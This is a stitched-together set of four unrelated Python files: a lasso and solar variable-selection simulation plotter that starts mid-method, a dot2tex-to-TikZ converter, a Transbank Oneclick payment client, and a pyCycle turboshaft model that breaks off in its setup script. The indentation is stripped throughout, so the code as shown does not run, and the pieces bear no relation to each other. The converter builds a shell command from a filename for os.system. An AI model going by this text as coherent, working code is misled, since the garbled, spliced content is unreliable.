#compute the probailities of solar/cv-lars-lasso/cv-cd selecting each variable.
for i in range(self.n_dim):
#1. Given the variable i in X, compute the probability of selecting it by solar via (1) counting how many i in 'solar_vari_appe_stack' (the stack of indices of variables selected by solar among 200 repeats) (2) divide that count by number of repeats (200 in paper) (3) save it as the i-th element of solar_plot_stack
solar_plot_stack.append((solar_vari_appe_stack == i).sum()/self.num_rep)
#2. Given the variable i in X, compute the probability of selecting it by cv-lars-lasso via (1) counting how many i in 'l_vari_appe_stack' (the stack of indices of variables selected by cv-lars-lasso among 200 repeats) (2) divide that count by number of repeats (200 in paper) (3) save it as the i-th element of l_plot_stack
l_plot_stack.append((l_vari_appe_stack == i).sum()/self.num_rep)
#3. Given the variable i in X, compute the probability of selecting it by cv-cd via (1) counting how many i in 'cd_vari_appe_stack' (the stack of indices of variables selected by cv-cd among 200 repeats) (2) divide that count by number of repeats (200 in paper) (3) save it as the i-th element of cd_plot_stack
cd_plot_stack.append((cd_vari_appe_stack == i).sum()/self.num_rep)
##Ranking (decreasingly) the probability of solar selecting each variable
####Since we only plot the redundant variable with top 35 probabilities, in this part we use the method called 'simultaneous sorting': sort two array (the array of 'probability of selecting each variable' and the array of 'labels for the horizontal axis in the figure') simultaneously based on the order of the first array
#1a. rank elements of 'solar_plot_stack' in increasing order; reverse it into decreasing order and save it as 'solar_plot_stack_ranked'
#1b. ranking 'solar_x_axi' based on the increasing order of 'solar_plot_stack' and save it as 'solar_x_axi_ranked'
solar_x_axi_ranked = [x for _,x in sorted(zip(solar_plot_stack,solar_x_axi))]
solar_plot_stack_ranked = np.sort(solar_plot_stack)[::-1]
#2. generate 'solar_label' as the label (for horizontal axis in figure) of each variable in the increasing order.
solar_labels = [ 'X' + str(x) for x in solar_x_axi_ranked]
#3. the index of variable plotted at each bar
solar_final_x_axi_ranked = solar_x_axi_ranked[::-1]
#4. reverse the order of 'solar_label' to decreasing order
solar_final_label = solar_labels[::-1]
##Ranking (decreasingly) the probability of cv-lars-lasso selecting each variable
##Since we only plot the redundant variable with top 35 probabilities, in this part we use the method called 'simultaneous sorting': sort two array (the array of 'probability of selecting each variable' and the array of 'labels for the horizontal axis in the figure') simultaneously based on the order of the first array
#1a. rank elements of 'l_plot_stack' in increasing order; reverse it into decreasing order and save it as 'l_plot_stack_ranked'
#1b. ranking 'l_x_axi' based on the increasing order of 'l_plot_stack' and save it as 'l_x_axi_ranked'
l_x_axi_ranked = [x for _,x in sorted(zip(l_plot_stack,l_x_axi))]
l_plot_stack_ranked = np.sort(l_plot_stack)[::-1]
#2. generate 'l_label' as the label (for horizontal axis in figure) of each variable in the increasing order.
l_labels = [ 'X' + str(x) for x in l_x_axi_ranked]
#3. the index of variable plotted at each bar
l_final_x_axi_ranked = l_x_axi_ranked[::-1]
#4. reverse the order of 'l_label' to decreasing order
l_final_label = l_labels[::-1]
##Ranking (decreasingly) the probability of cv-cd selecting each variable
##Since we only plot the redundant variable with top 35 probabilities, in this part we use the method called 'simultaneous sorting': sort two array (the array of 'probability of selecting each variable' and the array of 'labels for the horizontal axis in the figure') simultaneously based on the order of the first array
#1a. rank elements of 'cd_plot_stack' in increasing order; reverse it into decreasing order and save it as 'cd_plot_stack_ranked'
#1b. ranking 'cd_x_axi' based on the increasing order of 'cd_plot_stack' and save it as 'cd_x_axi_ranked'
cd_x_axi_ranked = [x for _,x in sorted(zip(cd_plot_stack,cd_x_axi))]
cd_plot_stack_ranked = np.sort(cd_plot_stack)[::-1]
#2. generate 'cd_label' as the label (for horizontal axis in figure) of each variable in the increasing order.
cd_labels = [ 'X' + str(x) for x in cd_x_axi_ranked]
#3. the index of variable plotted at each bar
cd_final_x_axi_ranked = cd_x_axi_ranked[::-1]
#4. reverse the order of 'cd_label' to decreasing order
cd_final_label = cd_labels[::-1]
#bar plot for solar
f4 = plt.figure()
# The big plot
ax = f4.add_subplot(111)
# Turn off axis lines and ticks of the big subplot
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.spines['right'].set_color('none')
ax.tick_params(labelcolor='w', top='off', bottom='off', left='off', right='off')
ax.yaxis.set_major_locator(plt.NullLocator())
#the bar plot of the probability of solar selecting each variable
ax1 = f4.add_subplot(212)
for i in range(min(num_var_to_plot, self.n_dim)):
#turn the bar plot of informative variables into red
if solar_final_x_axi_ranked[i] < 5:
ax1.bar(x = solar_x_axi[i], height= solar_plot_stack_ranked[i], width=0.3, color = ['red'])
#turn the bar plot of x_5 into orangered
elif solar_final_label[i] == 'X5':
ax1.bar(x = solar_x_axi[i], height= solar_plot_stack_ranked[i], width=0.3, color = ['orangered'])
#turn the bar plot of redundant variables into blue
else:
ax1.bar(x = solar_x_axi[i], height= solar_plot_stack_ranked[i], width=0.3, color = ['blue'])
# add the variable name as the labels for the horizontal axis of the bar plot
plt.xticks(solar_x_axi[0 : num_var_to_plot], solar_final_label[:num_var_to_plot], rotation='vertical')
plt.tick_params(axis='both', which='major', labelsize=16)
#if we want to see the probability for redundant variables, change the plot range of the horizontal axis
if print_true == False :
ax1.set_xlim(4.5, num_var_to_plot + 1)
ax1.set_ylim(0, 0.55)
ax1.set_ylabel('Probability', fontsize=16)
plt.title('solar', fontsize=16)
#if we want to see the probability for informative variables, change the plot range of the horizontal axis
else:
ax1.set_xlim(-0.5, 4.5)
ax1.set_ylim(0, 1.05)
ax1.set_ylabel('Probability', fontsize=16)
plt.title('solar', fontsize=16)
plt.tight_layout()
plt.show()
#output it as pdf file
if self.plot_on == True:
f4.savefig("./figure/acc_plot_top" + str(num_var_to_plot) + "_ic_" + str(self.coef_1) + "_" + str(print_true) + "_solar.pdf", bbox_inches='tight')
##bar plot of cv-lars-lasso
f44 = plt.figure()
# The big plot
ax00 = f44.add_subplot(111)
# Turn off axis lines and ticks of the big subplot
ax00.spines['top'].set_color('none')
ax00.spines['bottom'].set_color('none')
ax00.spines['left'].set_color('none')
ax00.spines['right'].set_color('none')
ax00.tick_params(labelcolor='w', top='off', bottom='off', left='off', right='off')
ax00.yaxis.set_major_locator(plt.NullLocator())
#the bar plot of the probability of cv-lars-lasso selecting each variable
ax2 = f44.add_subplot(212)
for i in range(min(num_var_to_plot, self.n_dim)):
#turn the bar plot of informative variables into red
if l_final_x_axi_ranked[i] < 5:
ax2.bar(x = l_x_axi[i], height= l_plot_stack_ranked[i], width=0.3, color = ['red'])
#turn the bar plot of x_5 into orangered
elif l_final_label[i] == 'X5':
ax2.bar(x = l_x_axi[i], height= l_plot_stack_ranked[i], width=0.3, color = ['orangered'])
#turn the bar plot of redundant variables into blue
else:
ax2.bar(x = l_x_axi[i], height= l_plot_stack_ranked[i], width=0.3, color = ['blue'])
# add the variable name as the labels for the horizontal axis of the bar plot
plt.xticks(l_x_axi[0 : num_var_to_plot], l_final_label[:num_var_to_plot], rotation='vertical')
plt.tick_params(axis='both', which='major', labelsize=16)
#if we want to see the probability for redundant variables, change the plot range of the horizontal axis
if print_true == False :
ax2.set_xlim(4.5, num_var_to_plot + 1)
ax2.set_ylim(0, 0.55)
ax2.set_ylabel('Probability', fontsize=16)
plt.title('CV-lars-lasso ', fontsize=16)
#if we want to see the probability for informative variables, change the plot range of the horizontal axis
else:
ax2.set_xlim(-0.5, 4.5)
ax2.set_ylim(0, 1.05)
ax2.set_ylabel('Probability', fontsize=16)
plt.title('CV-lars-lasso ', fontsize=16)
plt.tight_layout()
plt.show()
#output it as pdf file
if self.plot_on == True:
f44.savefig("./figure/acc_plot_top" + str(num_var_to_plot) + "_ic_" + str(self.coef_1) + "_" + str(print_true) + "_lars.pdf", bbox_inches='tight')
#bar plot for cv-cd
f444 = plt.figure()
# The big plot
ax000 = f444.add_subplot(111)
# Turn off axis lines and ticks of the big subplot
ax000.spines['top'].set_color('none')
ax000.spines['bottom'].set_color('none')
ax000.spines['left'].set_color('none')
ax000.spines['right'].set_color('none')
ax000.tick_params(labelcolor='w', top='off', bottom='off', left='off', right='off')
ax000.yaxis.set_major_locator(plt.NullLocator())
#bar plot of the probability of cv-cd selecting each variable
ax3 = f444.add_subplot(212)
for i in range(min(num_var_to_plot, self.n_dim)):
#turn the bar plot of informative variables into red
if cd_final_x_axi_ranked[i] < 5:
ax3.bar(x = cd_x_axi[i], height= cd_plot_stack_ranked[i], width=0.3, color = ['red'])
#turn the bar plot of x_5 into orangered
elif cd_final_label[i] == 'X5':
ax3.bar(x = cd_x_axi[i], height= cd_plot_stack_ranked[i], width=0.3, color = ['orangered'])
#turn the bar plot of redundant variables into blue
else:
ax3.bar(x = cd_x_axi[i], height= cd_plot_stack_ranked[i], width=0.3, color = ['blue'])
# add the variable name as the labels for the horizontal axis of the bar plot
plt.xticks(cd_x_axi[0 : num_var_to_plot], cd_final_label[:num_var_to_plot], rotation='vertical')
plt.tick_params(axis='both', which='major', labelsize=16)
#if we want to see the probability for redundant variables, change the plot range of the horizontal axis
if print_true == False :
ax3.set_xlim(4.5, num_var_to_plot + 1)
ax3.set_ylim(0, 0.55)
ax3.set_ylabel('Probability', fontsize=16)
plt.title('CV-cd', fontsize=16)
#if we want to see the probability for informative variables, change the plot range of the horizontal axis
else:
ax3.set_xlim(-0.5, 4.5)
ax3.set_ylim(0, 1.05)
ax3.set_ylabel('Probability', fontsize=16)
plt.title('CV-cd', fontsize=16)
plt.tight_layout()
plt.show()
#output it as pdf file
if self.plot_on == True:
f444.savefig("./figure/acc_plot_top" + str(num_var_to_plot) + "_ic_" + str(self.coef_1) + "_" + str(print_true) + "_cd.pdf", bbox_inches='tight')
else:
print("Warning: this simulation and plotting classes is composed only for the cases where irrepresentable condition is satistied. When irrepresentable condition is violated, the ranking of variables in plots and their probaility will be in error and misordered.")
def bl_vari_plot(self, solar_coef_stack, num_var_to_plot):
#boxplot of each solar regression coefficient
#since we only boxplot olar regression coefficients (of top 15 means), we do the ranking again
if self.coef_t <= 1:
#boxplot of each regression coefficient for solar
bl_coef_stack = np.concatenate(solar_coef_stack,1)
solar_x_axi = np.arange(0, self.n_dim)
solar_plot_stack = np.mean(bl_coef_stack, axis=1)
solar_final_x_axi_ranked = [x for _,x in sorted(zip(solar_plot_stack,solar_x_axi))][::-1]
#solar_plot_stack_ranked = np.sort(solar_plot_stack)[::-1]
solar_final_label = [ 'beta' + str(x) for x in solar_final_x_axi_ranked]
f3 = plt.figure()
plt.boxplot(list(bl_coef_stack[solar_final_x_axi_ranked[:num_var_to_plot],:]),
positions=solar_x_axi[:num_var_to_plot])
plt.xticks(solar_x_axi[0 : num_var_to_plot], solar_final_label[:num_var_to_plot], rotation='vertical')
loc_5 = solar_final_x_axi_ranked.index(5)
if loc_5 <= num_var_to_plot:
plt.axvspan(loc_5 - 0.5, loc_5 + 0.5, color='red', alpha=0.25)
plt.title('The boxplot of solar regression coefficient', fontsize=16)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.tight_layout()
plt.show()
#count in how many repeats solar estimate the regression coefficient of x_0 as 0
print('the number of non-zeros in the boxplot of beta_0: ', self.num_rep - len(np.where(bl_coef_stack[0,:] == 0)[0]))
#count in how many repeats solar estimate the regression coefficient of x_1 as 1
print('the number of non-zeros in the boxplot of beta_1: ', self.num_rep - len(np.where(bl_coef_stack[1,:] == 0)[0]))
#count in how many repeats solar estimate the regression coefficient of x_2 as 2
print('the number of non-zeros in the boxplot of beta_2: ', self.num_rep - len(np.where(bl_coef_stack[2,:] == 0)[0]))
#count in how many repeats solar estimate the regression coefficient of x_3 as 3
print('the number of non-zeros in the boxplot of beta_3: ', self.num_rep - len(np.where(bl_coef_stack[3,:] == 0)[0]))
#count in how many repeats solar estimate the regression coefficient of x_4 as 4
print('the number of non-zeros in the boxplot of beta_4: ', self.num_rep - len(np.where(bl_coef_stack[4,:] == 0)[0]))
#output it as pdf file
if self.plot_on == True:
f3.savefig("./figure/solar_vari_plot_top"+str(num_var_to_plot)+"_ic_"+str(self.coef_1)+".pdf", bbox_inches='tight')
else:
print("Warning: this simulation and plotting classes is composed only for the cases where irrepresentable condition is satistied. When irrepresentable condition is violated, the ranking of variables in plots and their probaility will be in error and misordered.")
##################################
# test if this module works fine #
##################################
'''
this part is set up to test the functionability of the class above;
you can run all the codes in this file to test if the class works;
when you call the class from this file, the codes (even functions or classes) after " if __name__ == '__main__': " will be ingored
'''
if __name__ == '__main__':
sample_size = 200
n_dim = 100
n_info = 5
n_repeat = 3
step_size = -0.02
num_rep = 3
rnd_seed = 1
coef_1 = 1/3
coef_2 = 1/3
plot_on = False
trial = simul_plot(sample_size, n_dim, n_info, coef_1, coef_2, n_repeat, num_rep, step_size, rnd_seed, plot_on)
opt_c_stack, Q_opt_c_stack, la_array_stack, la_var_stack, solar_coef_stack, abs_ic_stack, cd_array_stack, cd_var_stack = trial.simul_func()
trial.vari_hist(Q_opt_c_stack, la_array_stack, cd_array_stack)
trial.q_hist(opt_c_stack)
print_true_1 = True
print_true_2 = False
num_var_to_plot_1 = 15
trial.acc_plot(Q_opt_c_stack, la_var_stack, cd_var_stack, num_var_to_plot_1, print_true_1)
trial.acc_plot(Q_opt_c_stack, la_var_stack, cd_var_stack, num_var_to_plot_1, print_true_2)
trial.bl_vari_plot(solar_coef_stack, num_var_to_plot_1)
|
import re
import os
class converter(object):
def __init__(self, params):
self.figure = params.get('figure')
self.labelled_nodes = params.get('labelled_nodes')
self.filename = params.get('filename')
def export_to_tex(self):
mod_str = self.figure.to_string()
f = open("../figures/%s.dot" %self.filename, "w+")
f.write(mod_str)
f.close()
cmd = "dot2tex -tmath --figonly ../figures/%s.dot > ../figures/%s.tex" % (self.filename, self.filename)
os.system(cmd)
def __construct_labels(self):
lines = []
lines.append("\\begin{scope}\n")
for l in self.labelled_nodes.values():
lines.append(" \draw (%sbp, -10bp) node {%s};\n" %(l[1], l[0]))
lines.append("\\end{scope}\n")
return lines
def postprocess_tex(self):
f = open("../figures/" + self.filename + ".tex")
lines = f.readlines()
f.close()
layer = 0
f = open("../figures/" + self.filename + ".tex", "w+")
for l in lines:
if "\\begin{tikz" in l:
l = "\\begin{tikzpicture}[>=latex,line join=bevel, scale = 0.2]\n"
if "\pgfsetlinewidth{1bp}" in l:
l = " \pgfsetlinewidth{0.2bp}\n"
if "\draw" in l and any("_{%d}$" %k in l for k in self.labelled_nodes.keys()):
node = int(re.search("\_\{[0-9]+", l).group(0)[2:])
x_coordinate = re.search("\([0-9]+.[0-9]", l).group(0)[1:]
self.labelled_nodes[node] = (self.labelled_nodes[node], x_coordinate)
if "\\end{tikzpicture}" in l:
labels_tex = self.__construct_labels()
f.writelines(labels_tex)
f.write(l)
f.close()
def export_processed(self):
self.export_to_tex()
self.postprocess_tex()
|
import requests
from transbank.common.headers_builder import HeadersBuilder
from transbank.common.integration_type import IntegrationType, webpay_host
from transbank.common.options import Options, WebpayOptions
from transbank import oneclick
from transbank.error.transaction_authorize_error import TransactionAuthorizeError
from transbank.error.transaction_refund_error import TransactionRefundError
from transbank.error.transaction_status_error import TransactionStatusError
from transbank.oneclick.request import TransactionAuthorizeRequest, TransactionRefundRequest, \
MallTransactionAuthorizeDetails
from transbank.oneclick.response import TransactionAuthorizeResponse, TransactionRefundResponse, \
TransactionStatusResponse
from transbank.oneclick.schema import TransactionAuthorizeRequestSchema, TransactionAuthorizeResponseSchema, \
TransactionRefundRequestSchema, TransactionRefundResponseSchema, TransactionStatusResponseSchema
class MallTransaction(object):
@classmethod
def __base_url(cls, integration_type: IntegrationType):
return "{}/rswebpaytransaction/api/oneclick/v1.2".format(
webpay_host(integration_type))
@classmethod
def build_options(cls, options: Options = None) -> Options:
alt_options = WebpayOptions(oneclick.commerce_code, oneclick.api_key,
oneclick.integration_type)
if options is not None:
alt_options.commerce_code = options.commerce_code or oneclick.commerce_code
alt_options.api_key = options.api_key or oneclick.api_key
alt_options.integration_type = options.integration_type or oneclick.integration_type
return alt_options
@classmethod
def authorize(cls, user_name: str, tbk_user: str, buy_order: str, details: MallTransactionAuthorizeDetails,
options: Options = None) -> TransactionAuthorizeResponse:
options = cls.build_options(options)
endpoint = '{}/{}'.format(cls.__base_url(options.integration_type), 'transactions')
request = TransactionAuthorizeRequest(user_name, tbk_user, buy_order, details.details)
data = TransactionAuthorizeRequestSchema().dumps(request).data
response = requests.post(endpoint, data,
headers=HeadersBuilder.build(options))
response_json = response.text
response_dict = TransactionAuthorizeResponseSchema().loads(response_json).data
if response.status_code not in range(200, 299):
raise TransactionAuthorizeError(message=response_dict["error_message"])
return TransactionAuthorizeResponse(**response_dict)
@classmethod
def refund(cls, buy_order: str, child_commerce_code: str, child_buy_order: str, amount: float,
options: Options = None) -> TransactionRefundResponse:
options = cls.build_options(options)
endpoint = '{}/{}/{}/refunds'.format(cls.__base_url(options.integration_type), 'transactions', buy_order)
request = TransactionRefundRequest(child_commerce_code, child_buy_order, amount)
response = requests.post(endpoint, data=TransactionRefundRequestSchema().dumps(request).data,
headers=HeadersBuilder.build(options))
response_json = response.text
response_dict = TransactionRefundResponseSchema().loads(response_json).data
if response.status_code not in range(200, 299):
raise TransactionRefundError(message=response_dict["error_message"])
return TransactionRefundResponse(**response_dict)
@classmethod
def status(cls, buy_order: str, options: Options = None):
options = cls.build_options(options)
endpoint = '{}/{}/{}'.format(cls.__base_url(options.integration_type), 'transactions', buy_order)
response = requests.get(endpoint, headers=HeadersBuilder.build(options))
response_json = response.text
response_dict = TransactionStatusResponseSchema().loads(response_json).data
if response.status_code not in range(200, 299):
raise TransactionStatusError(message=response_dict["error_message"])
return TransactionStatusResponse(**response_dict)
|
import sys
import numpy as np
import openmdao.api as om
import pycycle.api as pyc
class Turboshaft(om.Group):
def initialize(self):
self.options.declare('design', default=True,
desc='Switch between on-design and off-design calculation.')
def setup(self):
thermo_spec = pyc.species_data.janaf
design = self.options['design']
self.add_subsystem('fc', pyc.FlightConditions(thermo_data=thermo_spec, elements=pyc.AIR_MIX))
self.add_subsystem('inlet', pyc.Inlet(design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX))
self.add_subsystem('duct1', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX))
self.add_subsystem('lpc', pyc.Compressor(map_data=pyc.LPCMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX),
promotes_inputs=[('Nmech','IP_Nmech')])
self.add_subsystem('icduct', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX))
self.add_subsystem('hpc_axi', pyc.Compressor(map_data=pyc.HPCMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX),
promotes_inputs=[('Nmech','HP_Nmech')])
self.add_subsystem('bld25', pyc.BleedOut(design=design, bleed_names=['cool1','cool2']))
self.add_subsystem('hpc_centri', pyc.Compressor(map_data=pyc.HPCMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX),
promotes_inputs=[('Nmech','HP_Nmech')])
self.add_subsystem('bld3', pyc.BleedOut(design=design, bleed_names=['cool3','cool4']))
self.add_subsystem('duct6', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_MIX))
self.add_subsystem('burner', pyc.Combustor(design=design,thermo_data=thermo_spec,
inflow_elements=pyc.AIR_MIX,
air_fuel_elements=pyc.AIR_FUEL_MIX,
fuel_type='Jet-A(g)'))
self.add_subsystem('hpt', pyc.Turbine(map_data=pyc.HPTMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX,
bleed_names=['cool3','cool4']),
promotes_inputs=[('Nmech','HP_Nmech')])
self.add_subsystem('duct43', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX))
self.add_subsystem('lpt', pyc.Turbine(map_data=pyc.LPTMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX,
bleed_names=['cool1','cool2']),
promotes_inputs=[('Nmech','IP_Nmech')])
self.add_subsystem('itduct', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX))
self.add_subsystem('pt', pyc.Turbine(map_data=pyc.LPTMap, design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX),
promotes_inputs=[('Nmech','LP_Nmech')])
self.add_subsystem('duct12', pyc.Duct(design=design, thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX))
self.add_subsystem('nozzle', pyc.Nozzle(nozzType='CV', lossCoef='Cv', thermo_data=thermo_spec, elements=pyc.AIR_FUEL_MIX))
self.add_subsystem('lp_shaft', pyc.Shaft(num_ports=1),promotes_inputs=[('Nmech','LP_Nmech')])
self.add_subsystem('ip_shaft', pyc.Shaft(num_ports=2),promotes_inputs=[('Nmech','IP_Nmech')])
self.add_subsystem('hp_shaft', pyc.Shaft(num_ports=3),promotes_inputs=[('Nmech','HP_Nmech')])
self.add_subsystem('perf', pyc.Performance(num_nozzles=1, num_burners=1))
self.connect('duct1.Fl_O:tot:P', 'perf.Pt2')
self.connect('hpc_centri.Fl_O:tot:P', 'perf.Pt3')
self.connect('burner.Wfuel', 'perf.Wfuel_0')
self.connect('inlet.F_ram', 'perf.ram_drag')
self.connect('nozzle.Fg', 'perf.Fg_0')
self.connect('lp_shaft.pwr_in', 'perf.power')
self.connect('pt.trq', 'lp_shaft.trq_0')
self.connect('lpc.trq', 'ip_shaft.trq_0')
self.connect('lpt.trq', 'ip_shaft.trq_1')
self.connect('hpc_axi.trq', 'hp_shaft.trq_0')
self.connect('hpc_centri.trq', 'hp_shaft.trq_1')
self.connect('hpt.trq', 'hp_shaft.trq_2')
self.connect('fc.Fl_O:stat:P', 'nozzle.Ps_exhaust')
balance = self.add_subsystem('balance', om.BalanceComp())
if design:
balance.add_balance('W', units='lbm/s', eq_units=None)
self.connect('balance.W', 'inlet.Fl_I:stat:W')
self.connect('nozzle.PR', 'balance.lhs:W')
balance.add_balance('FAR', eq_units='degR', lower=1e-4, val=.017)
self.connect('balance.FAR', 'burner.Fl_I:FAR')
self.connect('burner.Fl_O:tot:T', 'balance.lhs:FAR')
balance.add_balance('lpt_PR', val=1.5, lower=1.001, upper=8, eq_units='hp', rhs_val=0.)
self.connect('balance.lpt_PR', 'lpt.PR')
self.connect('ip_shaft.pwr_net', 'balance.lhs:lpt_PR')
balance.add_balance('hpt_PR', val=1.5, lower=1.001, upper=8, eq_units='hp', rhs_val=0.)
self.connect('balance.hpt_PR', 'hpt.PR')
self.connect('hp_shaft.pwr_net', 'balance.lhs:hpt_PR')
balance.add_balance('pt_PR', val=1.5, lower=1.001, upper=8, eq_units='hp', rhs_val=0.)
self.connect('balance.pt_PR', 'pt.PR')
self.connect('lp_shaft.pwr_net', 'balance.lhs:pt_PR')
else:
# Need to check all these balances once power turbine map is updated
balance.add_balance('FAR', eq_units='lbf', lower=1e-4, val=.017)
self.connect('balance.FAR', 'burner.Fl_I:FAR')
self.connect('perf.Fn', 'balance.lhs:FAR')
balance.add_balance('W', units='lbm/s', eq_units=None)
self.connect('balance.W', 'inlet.Fl_I:stat:W')
self.connect('nozzle.Throat:stat:area', 'balance.lhs:W')
balance.add_balance('IP_Nmech', val=12000.0, units='rpm', lower=1.001, eq_units='hp', rhs_val=0.)
self.connect('balance.IP_Nmech', 'IP_Nmech')
self.connect('ip_shaft.pwr_net', 'balance.lhs:IP_Nmech')
balance.add_balance('HP_Nmech', val=14800.0, units='rpm', lower=1.001, eq_units='hp', rhs_val=0.)
self.connect('balance.HP_Nmech', 'HP_Nmech')
self.connect('hp_shaft.pwr_net', 'balance.lhs:HP_Nmech')
balance.add_balance('LP_Nmech', val=1800.0, units='rpm', lower=1.001, eq_units='hp', rhs_val=0.)
self.connect('balance.LP_Nmech', 'LP_Nmech')
self.connect('lp_shaft.pwr_net', 'balance.lhs:LP_Nmech')
pyc.connect_flow(self, 'fc.Fl_O', 'inlet.Fl_I', connect_w=False)
pyc.connect_flow(self, 'inlet.Fl_O', 'duct1.Fl_I')
pyc.connect_flow(self, 'duct1.Fl_O', 'lpc.Fl_I')
pyc.connect_flow(self, 'lpc.Fl_O', 'icduct.Fl_I')
pyc.connect_flow(self, 'icduct.Fl_O', 'hpc_axi.Fl_I')
pyc.connect_flow(self, 'hpc_axi.Fl_O', 'bld25.Fl_I')
pyc.connect_flow(self, 'bld25.Fl_O', 'hpc_centri.Fl_I')
pyc.connect_flow(self, 'hpc_centri.Fl_O', 'bld3.Fl_I')
pyc.connect_flow(self, 'bld3.Fl_O', 'duct6.Fl_I')
pyc.connect_flow(self, 'duct6.Fl_O', 'burner.Fl_I')
pyc.connect_flow(self, 'burner.Fl_O', 'hpt.Fl_I')
pyc.connect_flow(self, 'hpt.Fl_O', 'duct43.Fl_I')
pyc.connect_flow(self, 'duct43.Fl_O', 'lpt.Fl_I')
pyc.connect_flow(self, 'lpt.Fl_O', 'itduct.Fl_I')
pyc.connect_flow(self, 'itduct.Fl_O', 'pt.Fl_I')
pyc.connect_flow(self, 'pt.Fl_O', 'duct12.Fl_I')
pyc.connect_flow(self, 'duct12.Fl_O', 'nozzle.Fl_I')
pyc.connect_flow(self, 'bld25.cool1', 'lpt.cool1', connect_stat=False)
pyc.connect_flow(self, 'bld25.cool2', 'lpt.cool2', connect_stat=False)
pyc.connect_flow(self, 'bld3.cool3', 'hpt.cool3', connect_stat=False)
pyc.connect_flow(self, 'bld3.cool4', 'hpt.cool4', connect_stat=False)
newton = self.nonlinear_solver = om.NewtonSolver()
newton.options['atol'] = 1e-6
newton.options['rtol'] = 1e-6
newton.options['iprint'] = 2
newton.options['maxiter'] = 10
newton.options['solve_subsystems'] = True
newton.options['max_sub_solves'] = 100
newton.options['reraise_child_analysiserror'] = False
newton.linesearch = om.BoundsEnforceLS()
# newton.linesearch = ArmijoGoldsteinLS()
# newton.linesearch.options['c'] = .0001
newton.linesearch.options['bound_enforcement'] = 'scalar'
newton.linesearch.options['iprint'] = -1
self.linear_solver = om.DirectSolver()
def viewer(prob, pt, file=sys.stdout):
"""
print a report of all the relevant cycle properties
"""
print(file=file, flush=True)
print(file=file, flush=True)
print(file=file, flush=True)
print("----------------------------------------------------------------------------", file=file, flush=True)
print(" POINT:", pt, file=file, flush=True)
print("----------------------------------------------------------------------------", file=file, flush=True)
print(" PERFORMANCE CHARACTERISTICS", file=file, flush=True)
print(" Mach Alt W Fn Fg Fram OPR PSFC ")
print(" %7.5f %7.1f %7.3f %7.1f %7.1f %7.1f %7.3f %7.5f" \
%(prob[pt+'.fc.Fl_O:stat:MN'], prob[pt+'.fc.alt'],prob[pt+'.inlet.Fl_O:stat:W'], \
prob[pt+'.perf.Fn'],prob[pt+'.perf.Fg'],prob[pt+'.inlet.F_ram'],prob[pt+'.perf.OPR'],prob[pt+'.perf.PSFC']))
fs_names = ['fc.Fl_O','inlet.Fl_O','duct1.Fl_O','lpc.Fl_O',
'icduct.Fl_O','hpc_axi.Fl_O','bld25.Fl_O',
'hpc_centri.Fl_O','bld3.Fl_O','duct6.Fl_O',
'burner.Fl_O','hpt.Fl_O','duct43.Fl_O','lpt.Fl_O',
'itduct.Fl_O','pt.Fl_O','duct12.Fl_O','nozzle.Fl_O']
fs_full_names = [f'{pt}.{fs}' for fs in fs_names]
pyc.print_flow_station(prob, fs_full_names, file=file)
comp_names = ['lpc','hpc_axi','hpc_centri']
comp_full_names = [f'{pt}.{c}' for c in comp_names]
pyc.print_compressor(prob, comp_full_names, file=file)
pyc.print_burner(prob, [f'{pt}.burner'])
turb_names = ['hpt','lpt']
turb_full_names = [f'{pt}.{t}' for t in turb_names]
pyc.print_turbine(prob, turb_full_names, file=file)
noz_names = ['nozzle']
noz_full_names = [f'{pt}.{n}' for n in noz_names]
pyc.print_nozzle(prob, noz_full_names, file=file)
shaft_names = ['hp_shaft','lp_shaft']
shaft_full_names = [f'{pt}.{s}' for s in shaft_names]
pyc.print_shaft(prob, shaft_full_names, file=file)
bleed_names = ['bld25', 'bld3']
bleed_full_names = [f'{pt}.{b}' for b in bleed_names]
pyc.print_bleed(prob, bleed_full_names, file=file)
if __name__ == "__main__":
import time
from openmdao.api import Problem
from openmdao.utils.units import convert_units as cu
prob = om.Problem()
des_vars = prob.model.add_subsystem('des_vars', om.IndepVarComp(), promotes=["*"])
# FOR DESIGN
des_vars.add_output('alt', 28000., units='ft'),
des_vars.add_output('MN', 0.5),
des_vars.add_output('T4max', 2740.0, units='degR'),
des_vars.add_output('nozz_PR_des', 1.1)
des_vars.add_output('inlet:ram_recovery', 1.0),
des_vars.add_output('inlet:MN_out', 0.4),
des_vars.add_output('duct1:dPqP', 0.0),
des_vars.add_output('duct1:MN_out', 0.4),
des_vars.add_output('lpc:PRdes', 5.000),
des_vars.add_output('lpc:effDes', 0.8900),
des_vars.add_output('lpc:MN_out', 0.3),
des_vars.add_output('icduct:dPqP', 0.002),
des_vars.add_output('icduct:MN_out', 0.3),
des_vars.add_output('hpc_axi:PRdes', 3.0),
des_vars.add_output('hpc_axi:effDes', 0.8900),
des_vars.add_output('hpc_axi:MN_out', 0.25),
des_vars.add_output('bld25:cool1:frac_W', 0.024),
des_vars.add_output('bld25:cool2:frac_W', 0.0146),
des_vars.add_output('bld25:MN_out', 0.3000),
des_vars.add_output('hpc_centri:PRdes', 2.7),
des_vars.add_output('hpc_centri:effDes', 0.8800),
des_vars.add_output('hpc_centri:MN_out', 0.20),
des_vars.add_output('bld3:cool3:frac_W', 0.1705),
des_vars.add_output('bld3:cool4:frac_W', 0.1209),
des_vars.add_output('bld3:MN_out', 0.2000),
des_vars.add_output('duct6:dPqP', 0.00),
des_vars.add_output('duct6:MN_out', 0.2000),
des_vars.add_output('burner:dPqP', 0.050),
des_vars.add_output('burner:MN_out', 0.15),
des_vars.add_output('hpt:effDes', 0.89),
des_vars.add_output('hpt:cool3:frac_P', 1.0),
